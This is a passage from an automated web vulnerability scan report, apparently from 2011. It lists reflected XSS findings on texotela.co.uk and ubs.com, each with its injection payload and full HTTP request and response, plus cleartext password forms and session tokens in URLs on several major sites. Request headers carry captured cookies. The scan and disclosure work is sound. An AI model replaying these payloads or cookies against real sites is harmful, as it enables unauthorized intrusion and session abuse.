   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<input type="hidden" name="url" value="https://www.microsoft.com/presspass/presskits/DCU/default.aspx3945d"style="x:expression(alert(1))"b82259b5aa" />
...[SNIP]...
2.57. http://www.texotela.co.uk/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.texotela.co.uk
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4a571<script>alert(1)</script>9d4dfafd95d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4a571<script>alert(1)</script>9d4dfafd95d=1 HTTP/1.1
Host: www.texotela.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:48 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4087
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>::TexoTela:: </title>
<style type="te
...[SNIP]...
<strong>/?4a571<script>alert(1)</script>9d4dfafd95d=1</strong>
...[SNIP]...
2.58. http://www.texotela.co.uk/code/jquery/newsticker/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.texotela.co.uk
Path:   /code/jquery/newsticker/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f60af<script>alert(1)</script>3c6dcac904f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /codef60af<script>alert(1)</script>3c6dcac904f/jquery/newsticker/ HTTP/1.1
Host: www.texotela.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 06 Jul 2011 13:57:52 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>::TexoTela:: Page Not Found</title>
<
...[SNIP]...
<strong>/codef60af<script>alert(1)</script>3c6dcac904f/jquery/newsticker/</strong>
...[SNIP]...
2.59. http://www.texotela.co.uk/code/jquery/newsticker/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.texotela.co.uk
Path:   /code/jquery/newsticker/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3dd58<script>alert(1)</script>3809ac80451 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /code/jquery3dd58<script>alert(1)</script>3809ac80451/newsticker/ HTTP/1.1
Host: www.texotela.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 06 Jul 2011 13:57:52 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>::TexoTela:: Page Not Found</title>
<
...[SNIP]...
<strong>/code/jquery3dd58<script>alert(1)</script>3809ac80451/newsticker/</strong>
...[SNIP]...
2.60. http://www.texotela.co.uk/code/jquery/newsticker/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.texotela.co.uk
Path:   /code/jquery/newsticker/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1b42b<script>alert(1)</script>d88ca01f5d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /code/jquery/newsticker1b42b<script>alert(1)</script>d88ca01f5d9/ HTTP/1.1
Host: www.texotela.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 06 Jul 2011 13:57:52 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>::TexoTela:: Page Not Found</title>
<
...[SNIP]...
<strong>/code/jquery/newsticker1b42b<script>alert(1)</script>d88ca01f5d9/</strong>
...[SNIP]...
2.61. http://www.texotela.co.uk/code/jquery/newsticker/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.texotela.co.uk
Path:   /code/jquery/newsticker/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b2c10<script>alert(1)</script>82844efb4b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /code/jquery/newsticker/?b2c10<script>alert(1)</script>82844efb4b8=1 HTTP/1.1
Host: www.texotela.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:57:51 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 5903
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>::TexoTela:: jQuery - newsticker</tit
...[SNIP]...
<strong>/code/jquery/newsticker/?b2c10<script>alert(1)</script>82844efb4b8=1</strong>
...[SNIP]...
2.62. https://wb1.ubs.com/cache/fin/pub/gvu/quotes/markets_instruments [REST URL parameter 6]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wb1.ubs.com
Path:   /cache/fin/pub/gvu/quotes/markets_instruments

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db38f'style%3d'x%3aexpression(alert(1))'fac0e5ec6df was submitted in the REST URL parameter 6. This input was echoed as db38f'style='x:expression(alert(1))'fac0e5ec6df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cache/fin/pub/gvu/quotes/markets_instrumentsdb38f'style%3d'x%3aexpression(alert(1))'fac0e5ec6df HTTP/1.1
Host: wb1.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 14:07:51 GMT
Server: Apache
Pragma: no-cache
Connection: close
Location: https://quotes-public.ubs.com/app/CGT/Workbench/wb/pageGroup/wb_pg_midb38f'style='x:expression(alert(1))'fac0e5ec6df
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 349
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF='https://quotes-public.ubs.com/app/CGT/Workbench/wb/pageGroup/wb_pg_midb38f'style='x:expression(alert(1))'fac0e5ec6df'>
...[SNIP]...
2.63. https://www.ubs.com/1/ssl/e/contact/contact.html [REST URL parameter 3]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ubs.com
Path:   /1/ssl/e/contact/contact.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5c20a'style%3d'x%3aexpression(alert(1))'5ef3e2c84d5 was submitted in the REST URL parameter 3. This input was echoed as 5c20a'style='x:expression(alert(1))'5ef3e2c84d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /1/ssl/e5c20a'style%3d'x%3aexpression(alert(1))'5ef3e2c84d5/contact/contact.html HTTP/1.1
Host: www.ubs.com
Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981837663:ss=1309981804815; ACOOKIE=C8ctADE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQAAAAAAAAABAAAAAQAAAC5oFE4OaBROAQAAAAEAAAAuaBRODmgUTgEAAAABAAAAITE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQ--

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:54:07 GMT
Server: Apache
Pragma: no-cache
Connection: close
Location: https://www2.ubs.com:443/1/ssl/e5c20a'style='x:expression(alert(1))'5ef3e2c84d5/contact/contact.html
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 333
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF='https://www2.ubs.com:443/1/ssl/e5c20a'style='x:expression(alert(1))'5ef3e2c84d5/contact/contact.html'>
...[SNIP]...
2.64. https://www.ubs.com/1/ssl/e/contact/contact.html [REST URL parameter 4]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ubs.com
Path:   /1/ssl/e/contact/contact.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload baef1'style%3d'x%3aexpression(alert(1))'5a105d5b3ce was submitted in the REST URL parameter 4. This input was echoed as baef1'style='x:expression(alert(1))'5a105d5b3ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /1/ssl/e/contactbaef1'style%3d'x%3aexpression(alert(1))'5a105d5b3ce/contact.html HTTP/1.1
Host: www.ubs.com
Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981837663:ss=1309981804815; ACOOKIE=C8ctADE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQAAAAAAAAABAAAAAQAAAC5oFE4OaBROAQAAAAEAAAAuaBRODmgUTgEAAAABAAAAITE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQ--

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:54:14 GMT
Server: Apache
Pragma: no-cache
Connection: close
Location: https://www2.ubs.com:443/1/ssl/e/contactbaef1'style='x:expression(alert(1))'5a105d5b3ce/contact.html
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 333
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF='https://www2.ubs.com:443/1/ssl/e/contactbaef1'style='x:expression(alert(1))'5a105d5b3ce/contact.html'>
...[SNIP]...
2.65. https://www.ubs.com/1/ssl/e/contact/contact.html [REST URL parameter 5]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ubs.com
Path:   /1/ssl/e/contact/contact.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4121f'style%3d'x%3aexpression(alert(1))'8f137a403b6 was submitted in the REST URL parameter 5. This input was echoed as 4121f'style='x:expression(alert(1))'8f137a403b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /1/ssl/e/contact/contact.html4121f'style%3d'x%3aexpression(alert(1))'8f137a403b6 HTTP/1.1
Host: www.ubs.com
Connection: keep-alive
Referer: http://www.ubs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981837663:ss=1309981804815; ACOOKIE=C8ctADE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQAAAAAAAAABAAAAAQAAAC5oFE4OaBROAQAAAAEAAAAuaBRODmgUTgEAAAABAAAAITE0Ljk2LjE5MC4xNTItMjYxMTYxMzI2NC4zMDE2MTg5MQ--

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:54:21 GMT
Server: Apache
Pragma: no-cache
Connection: close
Location: https://www2.ubs.com:443/1/ssl/e/contact/contact.html4121f'style='x:expression(alert(1))'8f137a403b6
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 333
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF='https://www2.ubs.com:443/1/ssl/e/contact/contact.html4121f'style='x:expression(alert(1))'8f137a403b6'>
...[SNIP]...
3. Cleartext submission of password  previous  next
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

3.1. http://twitter.com/intent/session  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://twitter.com
Path:   /intent/session

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /intent/session?return_to=%2Fintent%2Ftweet%3Fsource%3Dwebclient%26text%3Dhttps%253A%252F%252Fwww.microsoft.com%252Fpresspass%252Fpresskits%252FDCU%252Fdefault.aspx&source=webclient&text=https%3A%2F%2Fwww.microsoft.com%2Fpresspass%2Fpresskits%2FDCU%2Fdefault.aspx HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: js=1; __utmz=43838368.1308923300.10.3.utmcsr=support.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/app/answers/detail/a_id/4394; __utma=43838368.1598605414.1305368954.1308913365.1308923300.10; k=173.193.214.243.1309445969207029; guest_id=v1%3A13086187569807267; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--68bfb23ecb75192721faa31141f4cc93644031bd

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309950927-60253-54088
ETag: "36b99243bfb315e43cf77ffb34f0123a"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 11:15:27 GMT
X-Runtime: 0.01137
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 8d1959539e4fb4977e5ce9becc49dc0a878abe53
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1Ogxjc3JmX2lkIiUzZTA3YTMyYzhmOThkYmNi%250AMTRlMzRhNDVjNDMyZDNhNSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--14f6b43e796db4ce15e8d70d84d63b17d3a42eef; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 4344
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width; initial-scale=1.0;
...[SNIP]...
<div id="bd" role="main">

<form action="/intent/session" id="login-form" method="post"><div style="margin:0;padding:0">
...[SNIP]...
</label>
<input aria-required="true" class="password" id="password" name="session[password]" required="required" type="password" value="" />
</div>
...[SNIP]...
3.2. http://www.sipc.org/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sipc.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.sipc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 13:57:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SIPC - Securities Investor Protection Corporation</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
</td>
<form name="login" method="post" action="claim/module/login.cfm" target="_blank" onSubmit = "return checkForm(this);"><td width="95" bgcolor="#CBD4CB">
...[SNIP]...
</div>
<input type="Password" name="password" style="width:90px;">
<div style="padding-top:8px;">
...[SNIP]...
3.3. http://www.stumbleupon.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 10210
Date: Wed, 06 Jul 2011 11:21:19 GMT
Age: 0
Via: 1.1 varnish
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
</a>
               <form action="/login.php" name="formLogin" method="post" id="formLogin">                    
                   <ul>
...[SNIP]...
</label>
                           <input class="text" type="password" id="passwordHeader" name="password" maxlength="16" />
                           <input class="text hidden" type="text" value="Password" tabindex="0" name="dummyPassword" id="switch" />
...[SNIP]...
3.4. http://www.stumbleupon.com/login.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login.php HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 9553
Date: Wed, 06 Jul 2011 11:21:20 GMT
Age: 0
Via: 1.1 varnish
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
</h1>
                               <form method="post" name="formLogin" action="http://www.stumbleupon.com/login.php" id="loginForm">
                   <fieldset class=" labelLeft">
...[SNIP]...
<div class="iefix">
                               <input class="text" type="password" name="password" value="" maxlength="16" id="password" />
                               <a href="http://www.stumbleupon.com/reset_password/">
...[SNIP]...
4. Session token in URL  previous  next
There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

4.1. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=105884726134656&app_id=105884726134656&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df313020f9c%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df143104ab8%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2035863b4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df24aa56e24%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2035863b4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1fffad37%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2035863b4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c7a69384%26origin%3Dhttp%253A%252F%252Fwww.bebo.com%252Ff2847a9e74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2035863b4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=83J6J

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.226.45
X-Cnection: close
Date: Wed, 06 Jul 2011 11:22:08 GMT
Content-Length: 236

<script type="text/javascript">
parent.postMessage("cb=f1fffad37&origin=http\u00253A\u00252F\u00252Fwww.bebo.com\u00252Ff2847a9e74&relation=parent&transport=postmessage&frame=f2035863b4", "http:\/\/ww
...[SNIP]...
4.2. http://www.softlayer.com/about/contact-us/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.softlayer.com
Path:   /about/contact-us/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /about/contact-us/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:16 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:16 GMT
Connection: close
Content-Type: text/html
Content-Length: 26084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
